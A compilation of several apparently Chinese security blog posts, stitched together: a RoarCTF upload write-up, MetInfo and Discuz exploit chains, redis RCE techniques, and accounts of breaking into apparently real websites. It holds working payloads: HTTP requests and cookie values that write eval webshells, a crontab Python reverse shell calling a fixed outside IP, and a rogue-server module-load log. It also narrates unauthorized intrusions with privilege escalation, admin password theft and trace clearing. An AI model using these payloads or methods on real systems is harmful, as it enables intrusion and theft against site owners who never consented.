本文来自RoarCTF的 simple_upload

源代码

<?php
namespace Home\Controller;

use Think\Controller;

class IndexController extends Controller
{
    public function index()
    {
        show_source(__FILE__);
    }
    public function upload()
    {
        $uploadFile = $_FILES['file'] ;

        if (strstr(strtolower($uploadFile['name']), ".php") ) {
            return false;
        }

        $upload = new \Think\Upload();// 实例化上传类
        $upload->maxSize  = 4096 ;// 设置附件上传大小
        $upload->allowExts  = array('jpg', 'gif', 'png', 'jpeg');// 设置附件上传类型
        $upload->rootPath = './Public/Uploads/';// 设置附件上传目录
        $upload->savePath = '';// 设置附件上传子目录
        $info = $upload->upload() ;
        if(!$info) {// 上传错误提示错误信息
          $this->error($upload->getError());
          return;
        }else{// 上传成功 获取上传文件信息
          $url = __ROOT__.substr($upload->rootPath,1).$info['file']['savepath'].$info['file']['savename'] ;
          echo json_encode(array("url"=>$url,"success"=>1));
        }
    }
} 

源码中限制了$_FILES[file]文件名不能是.php文件，得想办法绕过。 $upload->allowExts 并不是 Think\Upload 类的正确用法，所以 allowexts 后缀名限制是无效的。

熟悉 thinkphp 的应该知道， upload() 函数不传参时为多文件上传，整个 $_FILES 数组的文件都会上传保存。

题目中只限制了 $_FILES[file] 的上传后缀，也只给出 $_FILES[file] 上传后的路径，那我们上传多文件就可以绕过 php 后缀限制。

下一步就是要知道上传后的php文件名。看一下 think\upload 类是怎么生成文件名的

https://github.com/berTrAM888/RoarCTF-Writeup-some-Source-Code/blob/master/Web/simple_upload/docker/html/ThinkPHP/Library/Think/Upload.class.php#L27

'saveName'     => array('uniqid', ''), //上传文件命名规则，[0]-函数名，[1]-参数，多个参数使用数组 

可以看到使用的是uniqid来生成文件名，同时上传txt文件跟php文件，txt上传后的文件名跟php的文件名非常接近。我们只需要构造Burp包，遍历爆破txt文件名后三位 0-9 a-f 的文件名，就能猜出php的文件名。

把 $upload->allowExts 替换成 $upload->exts 就可以修补这个漏洞了。

文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。

svn泄露

svn是一个开放源代码的版本控制系统，如果在网站中存在.svn目录，那么我们可以拿到网站的源代码，方便审计。关于svn泄露需要注意的是SVN 版本 >1.7 时，Seay的工具不能dump源码了。可以用@admintony师傅的脚本来利用 https://github.com/admintony/svnExploit/

在目标站中发现了http://php.local/.svn/目录泄露源代码，发现是metinfo cms，拿到了位于config/config_safe.php中的key，这个key起到了很大作用。

什么是key呢？为什么要有这个key呢？

在metinfo安装完成后，会在config/config_safe.php写入一个key，这个key是用来加密解密账户信息的，你可以在app/system/include/class/auth.class.php看到加解密算法。

可以看到加解密采用了$this->auth_key.$key作为盐值，$key默认为空，那么这个$this->auth_key在哪定义的呢？

config/config.inc.php:109

有了这个key，我们可以自己针对性去加密解密程序密文。

有什么用呢？大部分的cms都会有全局参数过滤，而metinfo的全局过滤简直变态，我们很难直接从request中找到可用的sql注入，而加了密之后的参数一半不会再进行过滤了，我们可以找下可控的加密参数。

正则匹配导致的注入

全局搜索$auth->decode寻找可控的参数，并且不走过滤的。

app/system/user/web/getpassword.class.php:93

public function dovalid() {
    global $_M;
    $auth = load::sys_class('auth', 'new');
    $email = $auth->decode($_M['form']['p']);
    if(!is_email($email))$email = '';
    if($email){
        if($_M['form']['password']){
            $user = $this->userclass->get_user_by_email($email);
            if($user){
                if($this->userclass->editor_uesr_password($user['id'],$_M['form']['password'])){
                    okinfo($_M['url']['login'], $_M['word']['modifypasswordsuc']);
                }else{
                    okinfo($_M['url']['login'], $_M['word']['opfail']);
                }
            }else{
                okinfo($_M['url']['login'], $_M['word']['NoidJS']);
            }
        }
        require_once $this->view('app/getpassword_mailset',$this->input);
    }else{
        okinfo($_M['url']['register'], $_M['word']['emailvildtips2']);
    }
}

可以看到$email直接从$_M['form']['p']中经过$auth->decode 解密获取，并没有进行过滤，然后在get_user_by_email($email)中代入数据库查询。但是经过了is_email($email)判断是否为正确的邮箱地址。

跟进app/system/include/function/str.func.php:26

function is_email($email){
    $flag = true;
    $patten = '/[w-]+@[w-]+.[a-zA-Z.]*[a-zA-Z]$/';
    if(preg_match($patten, $email) == 0){
        $flag = false;
    }
    return $flag;
}

很正常的正则表达式，但是唯一缺少的是^起始符！那么我们构造如' and 1=1-- 1@qq.com也会返回true！

email要经过$auth->decode解密，这个时候我们的key就派上用场了，我们可以使用$auth->encode()来加密我们的payload传进去，构成注入。

将auth类自己搞一份出来。

<?php
function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0){
    $ckey_length = 4;
    $key = md5($key ? $key : UC_KEY);
    $keya = md5(substr($key, 0, 16));
    $keyb = md5(substr($key, 16, 16));
    $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
    $cryptkey = $keya.md5($keya.$keyc);
    $key_length = strlen($cryptkey);
    $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
    $string_length = strlen($string);
    $result = '';
    $box = range(0, 255);
    $rndkey = array();
    for($i = 0; $i <= 255; $i++) {
        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
    }
    for($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
        $tmp = $box[$i];
        $box[$i] = $box[$j];
        $box[$j] = $tmp;
    }

    for($a = $j = $i = 0; $i < $string_length; $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$a];
        $box[$a] = $box[$j];
        $box[$j] = $tmp;
        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
    }

    if($operation == 'DECODE') {
        if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
            return substr($result, 26);
        } else {
            return '';
        }
    }else{
        return $keyc.str_replace('=', '', base64_encode($result));
    }
}

print_r(urlencode(authcode($_GET['p'],'ENCODE','cqQWPRhV91To7PmrI5Dd3FGIxjMQpLmt','0')));

需要注意这个123@qq.com是你自己注册的用户，如果met_user表中不存在一条记录，是延时不了的。

延时成功，你也可以构造布尔盲注，到此为止就是注入的部分，但是我们的目标是拿权限，一个注入就满足了？

组合拳

app/system/include/class/web.class.php:467 省略部分代码

public function __destruct(){
    global $_M;
    //读取缓冲区数据
    $output = str_replace(array('<!--<!---->','<!---->','<!--fck-->','<!--fck','fck-->','',"r",substr($admin_url,0,-1)),'',ob_get_contents());
    ob_end_clean();//清空缓冲区
...
    if($_M['form']['html_filename'] && $_M['form']['metinfonow'] == $_M['config']['met_member_force']){
        //静态页
        $filename = urldecode($_M['form']['html_filename']);
        if(stristr(PHP_OS,"WIN")) {
            $filename = @iconv("utf-8", "GBK", $filename);
        }
        if(stristr($filename, '.php')){
            jsoncallback(array('suc'=>0));
        }
        if(file_put_contents(PATH_WEB.$filename, $output)){
            jsoncallback(array('suc'=>1));
        }else{
            jsoncallback(array('suc'=>0));
        }
    }else{
        echo $output;//输出内容
    }
...
}

在前台基类web.class.php中有__destruct魔术方法，而在这个方法中使用file_put_contents(PATH_WEB.$filename, $output写入文件，其中$output是通过ob_get_contents()获取的缓冲区数据，而$filename是从$_M['form']['html_filename']拿出来的，我们可控。

但是有一个if条件$_M['form']['metinfonow'] == $_M['config']['met_member_force']，这个met_member_force在哪呢？在数据库里，我们可以通过刚才的注入拿到！

那么我们现在的目的就变为怎么去控制$output也就是缓冲区的值。

ob_start()在服务器打开一个缓冲区来保存所有的输出。所以在任何时候使用echo，输出都将被加入缓冲区中，直到程序运行结束或者使用ob_flush()来结束。

也就是说我们只要找到web.class.php或者继承web.class.php的子类中有可控的echo输出，配合刚才的注入便可以写入shell。

全局搜索extends web寻找子类，在子类中寻找可控echo输出，最终找到的是app/system/include/module/uploadify.class.php的doupfile()方法

public function set_upload($info){
    global $_M;
    $this->upfile->set('savepath', $info['savepath']);
    $this->upfile->set('format', $info['format']);
    $this->upfile->set('maxsize', $info['maxsize']);
    $this->upfile->set('is_rename', $info['is_rename']);
    $this->upfile->set('is_overwrite', $info['is_overwrite']);
}
...
public function upload($formname){
    global $_M;
    $back = $this->upfile->upload($formname);
    return $back;
}
...
public function doupfile(){
    global $_M;
    $this->upfile->set_upfile();
    $info['savepath'] = $_M['form']['savepath'];
    $info['format'] = $_M['form']['format'];
    $info['maxsize'] = $_M['form']['maxsize'];
    $info['is_rename'] = $_M['form']['is_rename'];
    $info['is_overwrite'] = $_M['form']['is_overwrite'];
    $this->set_upload($info);
    $back = $this->upload($_M['form']['formname']);
    if($_M['form']['type']==1){
        if($back['error']){
            $back['error'] = $back['errorcode'];
        }else{
            $backs['path'] = $back['path'];

            $backs['append'] = 'false';
            $back = $backs;
        }
    }
    $back['filesize'] =  round(filesize($back['path'])/1024,2);
    echo jsonencode($back);
}
...

echo的$back变量是从$_M['form']['formname']取出来的，可控，向上推看back变量的取值由$this->upfile->upload($formname)决定，跟进。

public function upload($form = '') {
    global $_M;
    if($form){
        foreach($_FILES as $key => $val){
            if($form == $key){
                $filear = $_FILES[$key];
            }
        }
    }
    if(!$filear){
        foreach($_FILES as $key => $val){
            $filear = $_FILES[$key];
            break;
        }
    }

    //是否能正常上传
    if(!is_array($filear))$filear['error'] = 4;
    if($filear['error'] != 0 ){
        $errors = array(
            0 => $_M['word']['upfileOver4'],
            1 => $_M['word']['upfileOver'],
            2 => $_M['word']['upfileOver1'],
            3 => $_M['word']['upfileOver2'],
            4 => $_M['word']['upfileOver3'],
            6 => $_M['word']['upfileOver5'],
            7 => $_M['word']['upfileOver5']
        );
        $error_info[]= $errors[$filear['error']] ? $errors[$filear['error']] : $errors[0];
        return $this->error($errors[$filear['error']]);
    }
    ...
    //文件大小是否正确{}
    if ($filear["size"] > $this->maxsize || $filear["size"] > $_M['config']['met_file_maxsize']*1048576) {
        return $this->error("{$_M['word']['upfileFile']}".$filear["name"]." {$_M['word']['upfileMax']} {$_M['word']['upfileTip1']}");
    }
    //文件后缀是否为合法后缀
    $this->getext($filear["name"]); //获取允许的后缀
    if (strtolower($this->ext)=='php'||strtolower($this->ext)=='aspx'||strtolower($this->ext)=='asp'||strtolower($this->ext)=='jsp'||strtolower($this->ext)=='js'||strtolower($this->ext)=='asa') {
        return $this->error($this->ext." {$_M['word']['upfileTip3']}");
    }
    ...
}

省略部分代码

我们要看return回去的值就是back变量的值，所以重点关注return的东西看是否可控。

首先是正常foreach取出上传文件的信息，然后判断是否能正常上传-文件大小是否正确-文件后缀是否为合法后缀，如果有错就return。到这里有两种思路。

超出文件大小getshell

在后台中最大文件大小是8m，如果我们上传一个超出8m的文件，那么upload()函数就会return $this->error("{$_M['word']['upfileFile']}".$filear["name"]." {$_M['word']['upfileMax']} {$_M['word']['upfileTip1']}"); 而这个$filear["name"]是我们可控的，在foreach中赋值的。

那么这样我们就可以把$filear["name"]改为shell，然后return回去，赋值给$back，echo进缓冲区，最后file_put_contents拿到shell，完美的利用链。

但是这个8m太大了，我们可以通过注入进后台把这个限制改为0.0008

构造下payload，需要注意metinfonow参数是上文中从数据库中取出的met_member_force

POST /admin/index.php?c=uploadify&m=include&a=doupfile&lang=cn&metinfonow=xwtpwmp&html_filename=1.php HTTP/1.1
Host: php.local
Content-Length: 1120
Origin: http://php.local/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8tQiXReYsQYXHadW
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundary8tQiXReYsQYXHadW
Content-Disposition: form-data; name="test"; filename="<?php eval($_POST[1]);?>"
Content-Type: image/jpeg

testtesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttest
------WebKitFormBoundary8tQiXReYsQYXHadW--

无后缀getshell

@mochazz师傅在先知上分享了一篇metinfo6.1.3的getshell，我自己测试在6.2.0中已经修复，不过还是提一下。

问题出在 app/system/include/class/upfile.class.php:139 getext()函数

如果不是合法后缀会return $this->error($this->ext." {$_M['word']['upfileTip3']}")，而$this->ext经过getext()函数，跟进

protected function getext($filename) {
    if ($filename == "") {
        return ;
    }
    $ext = explode(".", $filename);
    $ext = $ext[count($ext) - 1];
    return $this->ext = $ext;
}

直接return $ext，那么我们上传一个无后缀的文件，文件名写一句话就可以getshell

payload

POST /admin/index.php?c=uploadify&m=include&a=doupfile&lang=cn&metinfonow=xwtpwmp&html_filename=1.php HTTP/1.1
Host: php.local
Content-Length: 194
Origin: http://php.local/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8tQiXReYsQYXHadW
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: XDEBUG_SESSION=PHPSTORM
Connection: close

------WebKitFormBoundary8tQiXReYsQYXHadW
Content-Disposition: form-data; name="test"; filename="<?php phpinfo();?>"
Content-Type: image/jpeg

test
------WebKitFormBoundary8tQiXReYsQYXHadW--

而在6.2.0中，加入了一行正则判断后缀，绕不过去，无法getshell

protected function getext($filename) {
    if ($filename == "") {
        return ;
    }
    $ext = explode(".", $filename);
    $ext = $ext[count($ext) - 1];
    if (preg_match("/^[0-9a-zA-Z]+$/u", $ext)) {
        return $this->ext = $ext;
    }
    return $this->ext = '';
}

总结

1. svn泄露分版本
2. 注册是邮件的正则匹配问题
3. 参数加密一般不走全局过滤 找找注入
4. 关注echo和ob_get_contents()函数 说不定能写shell呢

参考链接

1. https://nosec.org/home/detail/2436.html
2. https://xz.aliyun.com/t/4425

文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。

exp

修改Cookie中的xxxx_language字段为以下内容即可

%27.+file_put_contents%28%27shell.php%27%2Curldecode%28%27%253c%253fphp+%2520eval%28%2524_%2547%2545%2554%255b%2522a1%2522%255d%29%253b%253f%253e%27%29%29.%27

访问网站首页则会在根目录下生成木马文件,shell.php 密码为a1

定位漏洞位置

解码exp

'.+file_put_contents('shell.php',urldecode('<?php+ eval($_GET["a1"]);?>')).'

修改exp为_language=1.1.1;使其报错。

定位到653行

关键代码644行

$cachefile = './data/template/'.DISCUZ_LANG.'_'.(defined('STYLEID') ? STYLEID.'_' : '_').$templateid.'_'.str_replace('/', '_', $file).'.tpl.php';

cachefile变量是缓存文件，将其写入到/data/template/目录下，并且由DISCUZ_LANG拼接，追踪下DISCUZ_LANG的值
2088-2096行

global $_G;
if($_G['config']['output']['language'] == 'zh_cn') {
return 'SC_UTF8';
} elseif ($_G['config']['output']['language'] == 'zh_tw') {
return 'TC_UTF8';
} else {
//vot !!!! ToDo: Check this for other languages !!!!!!!!!!!!!!!!!!!!!
/*vot*/         return strtoupper(DISCUZ_LANG) . '_UTF8';
}

可以看到$_G['config']['output']['language']作为DISCUZ_LANG的值

全局搜索['language']

source/class/discuz/discuz_application.php 305行，发现是从cookie中拿到language的值

那么到这里整个漏洞的流程就很明显了，cookie中language参数可控导致DISCUZ_LANG可控，从而导致cachefile的文件名可被注入代码，最终include_once包含一下导致了造成代码执行。

phpinfo验证

Ov1T_2132_language='.phpinfo().';

修复建议

截止到本文发布之前，补丁还没有出来。

建议修改source/function/function_core.php 644行为

/*vot*/ $cachefile = './data/template/'.'sc'.'_'.(defined('STYLEID') ? STYLEID.'_' : '_').$templateid.'_'.str_replace('/', '_', $file).'.tpl.php';

删除可控变量

写在文后

其实从漏洞点的注释上来看就知道这是一个未完成的部分，毕竟还是TODO，开发人员得背锅。不过我怎么没有这种好运气呢，呜呜呜😭

在2019年7月7日结束的WCTF2019 Final上，LC/BC的成员Pavel Toporkov在分享会上介绍了一种关于redis新版本的RCE利用方式，比起以前的利用方式来说，这种利用方式更为通用，危害也更大，下面就让我们从以前的redis RCE利用方式出发，一起聊聊关于redis的利用问题。

https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf

通过写入文件 GetShell

未授权的redis会导致GetShell，可以说已经是众所周知的了。

127.0.0.1:6379> config set dir /var/spool/cron/crontabs
OK
127.0.0.1:6379> config set dbfilename root
OK
127.0.0.1:6379> get 1
"\n* * * * * /usr/bin/python -c 'import socket,subprocess,os,sys;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"115.28.78.16\",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n"
127.0.0.1:6379> save
OK

而这种方式是通过写文件来完成GetShell的，这种方式的主要问题在于，redis保存的数据并不是简单的json或者是csv，所以写入的文件都会有大量的无用数据，形似

[padding]
* * * * * /usr/bin/python -c 'import socket,subprocess,os,sys;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"115.28.78.16\",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'
[padding]

这种主要利用了crontab、ssh key、webshell这样的文件都有一定容错性，再加上crontab和ssh服务可以说是服务器的标准的服务，所以在以前，这种通过写入文件的getshell方式基本就可以说是很通杀了。

但随着现代的服务部署方式的不断发展，组件化成了不可逃避的大趋势，docker就是这股风潮下的产物之一，而在这种部署模式下，一个单一的容器中不会有除redis以外的任何服务存在，包括ssh和crontab，再加上权限的严格控制，只靠写文件就很难再getshell了，在这种情况下，我们就需要其他的利用手段了。

通过主从复制 GetShell

在介绍这种利用方式之前，首先我们需要介绍一下什么是主从复制和redis的模块。

Redis主从复制

Redis是一个使用ANSI C编写的开源、支持网络、基于内存、可选持久性的键值对存储数据库。但如果当把数据存储在单个Redis的实例中，当读写体量比较大的时候，服务端就很难承受。为了应对这种情况，Redis就提供了主从模式，主从模式就是指使用一个redis实例作为主机，其他实例都作为备份机，其中主机和从机数据相同，而从机只负责读，主机只负责写，通过读写分离可以大幅度减轻流量的压力，算是一种通过牺牲空间来换取效率的缓解方式。

这里我们开两台docker来做测试

ubuntu@VM-1-7-ubuntu:~/lorexxar$ sudo docker ps
CONTAINER ID        IMAGE               COMMAND                  CREATED             STATUS              PORTS                    NAMES
3fdb2479af9c        redis:5.0           "docker-entrypoint.s…"   22 hours ago        Up 4 seconds        0.0.0.0:6380->6379/tcp   epic_khorana
3e313c7498c2        redis:5.0           "docker-entrypoint.s…"   23 hours ago        Up 23 hours         0.0.0.0:6379->6379/tcp   vibrant_hodgkin

然后通过slaveof可以设置主从状态

这样一来数据就会自动同步了

Redis模块

在了解了主从同步之后，我们还需要对redis的模块有所了解。

在Reids 4.x之后，Redis新增了模块功能，通过外部拓展，可以实现在redis中实现一个新的Redis命令，通过写c语言并编译出.so文件。

编写恶意so文件的代码

https://github.com/RicterZ/RedisModules-ExecuteCommand

利用原理

Pavel Toporkov在2018年的zeronights会议上，分享了关于这个漏洞的详细原理。

https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf

在ppt中提到，在两个Redis实例设置主从模式的时候，Redis的主机实例可以通过FULLRESYNC同步文件到从机上。

然后在从机上加载so文件，我们就可以执行拓展的新命令了。

复现过程

这里我们选择使用模拟的恶意服务端来作为主机，并模拟fullresync请求。

https://github.com/LoRexxar/redis-rogue-server

然后启用redis 5.0的docker

ubuntu@VM-1-7-ubuntu:~/lorexxar/redis-rogue-server$ sudo docker ps
CONTAINER ID        IMAGE               COMMAND                  CREATED             STATUS              PORTS                    NAMES
3e313c7498c2        redis:5.0           "docker-entrypoint.s…"   25 hours ago        Up 25 hours         0.0.0.0:6379->6379/tcp   vibrant_hodgkin

为了能够更清晰的看到效果，这里我们把从服务端执行完成后删除的部分暂时注释掉。

然后直接通过脚本来攻击服务端

ubuntu@VM-1-7-ubuntu:~/lorexxar/redis-rogue-server$ python3 redis-rogue-server_5.py --rhost 172.17.0.3 --rport 6379 --lhost 172.17.0.1 --lport 6381
TARGET 172.17.0.3:6379
SERVER 172.17.0.1:6381
[<-] b'*3\r\n$7\r\nSLAVEOF\r\n$10\r\n172.17.0.1\r\n$4\r\n6381\r\n'
[->] b'+OK\r\n'
[<-] b'*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$6\r\nexp.so\r\n'
[->] b'+OK\r\n'
[->] b'*1\r\n$4\r\nPING\r\n'
[<-] b'+PONG\r\n'
[->] b'*3\r\n$8\r\nREPLCONF\r\n$14\r\nlistening-port\r\n$4\r\n6379\r\n'
[<-] b'+OK\r\n'
[->] b'*5\r\n$8\r\nREPLCONF\r\n$4\r\ncapa\r\n$3\r\neof\r\n$4\r\ncapa\r\n$6\r\npsync2\r\n'
[<-] b'+OK\r\n'
[->] b'*3\r\n$5\r\nPSYNC\r\n$40\r\n17772cb6827fd13b0cbcbb0332a2310f6e23207d\r\n$1\r\n1\r\n'
[<-] b'+FULLRESYNC ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ 1\r\n$42688\r\n\x7fELF\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00'......b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xea\x9f\x00\x00\x00\x00\x00\x00\xd3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r\n'
[<-] b'*3\r\n$6\r\nMODULE\r\n$4\r\nLOAD\r\n$8\r\n./exp.so\r\n'
[->] b'+OK\r\n'
[<-] b'*3\r\n$7\r\nSLAVEOF\r\n$2\r\nNO\r\n$3\r\nONE\r\n'
[->] b'+OK\r\n'

然后我们链接上去就可以执行命令

ubuntu@VM-1-7-ubuntu:~/lorexxar/redis-rogue-server$ redis-cli -h 172.17.0.3
172.17.0.3:6379> system.exec "id"
"\x89uid=999(redis) gid=999(redis) groups=999(redis)\n"
172.17.0.3:6379> system.exec "whoami"
"\bredis\n"

文章首发于T00LS,未经允许禁止转载

前言

记录某建站公司沦陷的过程。内容简单较为简单，欢迎各位表哥交流指导。

getshell

目标是某建站公司，大致看了一下伪静态，没什么直接撸的欲望，一边扫着端口的同时，一边测了几个案例网站。 好在没让我失望，注入一枚

这个时候端口也扫完了，有两个端口引起了我的注意，999和6588。分别是phpmyadmin和护卫神。 尝试了一下弱口令都无果，整理了一下收集到的信息，以及可利用的点。 案例站大部分与建站公司的网站在同一个服务器上，服务器为 iis7.5,windows2008（存在解析漏洞） 此时有几种方式getshell： 1.直接注入into outfile 2.前台随便找一个上传点传一个包含一句话的图片 3.注入案例站读取管理员密码后台上传 4.挖其他漏洞如：远程文件包含等可直接getshell漏洞 第一二条都失败了，案例站的数据库用户没有读写权限，前台无上传点，由于第四条相对于来说需要另外的时间去挖并且远程包含这种基本没戏，所以最终只能后台getshell了。执行命令发现无法执行，应该是权限不够？上传了aspx大马，访问500，心态炸裂。

提权思路： 1.phpmyadmin直接udf提权（无权限读写） 2.登录护卫神，和流光表哥@赢时胜流光同样的方法 3.搞一个可以解析aspx，权限高一点的网站？等 最后利用2，3结合搞定。

登录护卫神后台+提权

护卫神的漏洞利用条件是可以上传可执行脚本，来读取本地登录护卫神的cookie。shell已经拿到了，直接上传脚本读取cookie。f12 document.cookie 刷新:

这个护卫神是3.7版本的，没有找到上传点，但是不慌，有ftp账号密码，并且找到了支持asp,aspx的网站，直接上大马。可以执行命令，补丁打了倒是不少，查了一下可以利用的exp，用论坛里的几个免杀的烂土豆exp都失败了，webshell版的也报错。

最后弹到cs上，随手试了一下cs自带的提权exp ，ms14那个，尼玛成了。

tasklist /svc查看一下远程端口，由于是外网，直接登录。

读了管理员的密码，清理痕迹溜了。（密码是随机的十二位大小写加特殊字符，这谁顶得住啊） 

总结

水文，每次搞完回头再看的时候都觉得没什么技术含量，的确也是没有什么骚操作，总结一下这次渗透，只有这个读取cookie的php脚本，我学到了，嘻嘻嘻，溜溜球~

全文纯属虚构，如有雷同，就雷同吧。

目标国外站http://xxx.xx.com/

云悉指纹

ip：175.117.xxx.xxx 无cdn无waf

概览全局

访问直接跳转到http://xxx.xx.com/member/login.php

手动测试万能密码，尝试无果。

查看源代码寻找敏感路径或敏感api

发现敏感路径

访问仍然跳转到登陆界面，放弃。

目录有迹可循，没有加特殊前缀后缀，掏出御剑

http://xxx.com/admin

简陋后台，尝试万能密码，无果。

查看源代码，无果。(有些账号密码会写在源代码中！)

http://xxx.com/member

发现目录遍历，大部分都被重定向到登陆页面。看下御剑扫出的另外几个

xxx.com/temp/

http://xxx.com/html/ 404

http://xxx.com/data/ 看到这个我知道这个站死定了

被扫描器扫描之后创建了很多文件夹，并且时间都是最近的。很有可能后台编辑器不登陆就能用。

三个目录遍历点，我们需要耐心找下可以利用的文件或者目录。注意留意upload字样的文件夹，因为很有可能会有前人的脚印。这里说一点就是如果你找到前人的马但是不知道密码，你可以尝试下载同名的图片用记事本打开。

测试之后总结下可能被利用的点

http://xxx.xxx/data/imagesfile/upload/文件上传的目录

http://xxx.xxx/data/log/error_201511.logMySQL错误日志爆出绝对路径

http://xxx.xxx/member/check_userid.php

http://xxx/member/message.php

唯一没打码的黄字导航存在注入，post搜索框存在注入，无任何过滤

http://xxx/board/?bid=1

到这里我想的是root权限+绝对路径写shell，美滋滋？

然后sqlmap报了这个，非root，非dba，服了

那只能跑后台管理员账号密码了。。然后没找到管理员表。。。国外站就是太卡，让他先跑着，回头继续看目录遍历，我们现在的目的要转向上传点上。

然后我在目录遍历之中没找到上传点。服了。

峰回路转

在之前的注入点之中，

我忽略了一个细节，而这个细节是谷歌翻译帮助我发现的- –

这个注入点是查看帖子，那么与之相对应的右下角既是发布/创建帖子。

上传点

上传点可用

尝试getshell apache+php5.3 图片白名单 上传重命名 尝试解析漏洞和截断，无果。

发现编辑器还有一个上传点

抓包

未重命名！

apache解析漏洞getshell

访问404？？？

发现不存在_thumb这个目录，不知道怎么回事。

借助之前的目录遍历找到shell

蚁剑

权限是apache，

脏牛获取root，懒得截图了。

写在文后

总结：扫描=》发现目录遍历=》发现注入点=》发现编辑器=》解析漏洞=》getshell=》回马枪目录遍历找到shell=》脏牛

这篇文章花了半个小时去复现截图写稿，但是渗透的整个过程花掉了我两天时间，期间拐过各种坑，总而言之就是自己的经验不足，不够细心，谷歌翻译这个我是真的无语。实战是最好的老师。

文笔不好，写的很乱，见谅。

国外站，翻译的我尴尬证都犯了。

习惯性先发文章看看编辑器上传附件什么的。

四处上传，首先尝试编辑器处上传图片，经验告诉我越low的编辑器越好拿shell。

我错了，白名单+上传重命名，smarteditor编辑器，各种截断尝试，突破不了。

这编辑器无敌。随后发现另外三处均是调用此编辑器上传，暂时换思路。

在已经发布的文章中发现绝对路径

测试后发现public_html为根目录，决定挖挖注入，万一是root没降权就舒服了。

经过手动加sqlmap测试，发现后台存在时间盲注，由于国外站点访问不稳定的原因，遂放弃，在后期getshell之后发现用户不是root并且权限死得很，为之庆幸并没有在此处浪费时间。

到此处思路死了。编辑器getshell无解，sql注入getshell卒。还有什么思路呢？

我们之前爆出绝对路径的url访问后发现会自动下载

存在任意文件下载吗？先构造一下尝试

bingo！

存在任意文件下载，我们找下数据库配置文件

index.php一般会引入数据库的config.php

重新构造

数据库配置get！后发现没开3306外链，思路断掉。

在这个时候我重新回头看这个任意文件下载，读一下敏感文件试试？

password被注释掉，无用。

没发现有可用信息。

下载apache配置文件

惊了！html可以被当作php文件！

于是我去编辑器中尝试上传这几种文件，仍以失败告终。

但是附件的我们还没试！

抓包改后缀，返回文章查看路径

拼接

getshell!

后面的就不说了，提权就是脏牛+bypass disablefunc一条龙，没啥亮点。

本章结束，寡人欲休。

下载链接：http://www.niushop.com.cn/download.html Version：单商户 2.2

安装爆破MySQL密码

GET /niushop/install.php?action=true&dbserver=127.0.0.1&dbpassword=root2&dbusername=root&dbname=niushop_b2c HTTP/1.1
Host: 127.0.0.1
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36
Referer: http://127.0.0.1/niushop/install.php?refresh
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: action=db
Connection: close

爆破成功返回1，密码错误返回0

getshell

上传图片只做了前端校验，抓包改后缀即可绕过。

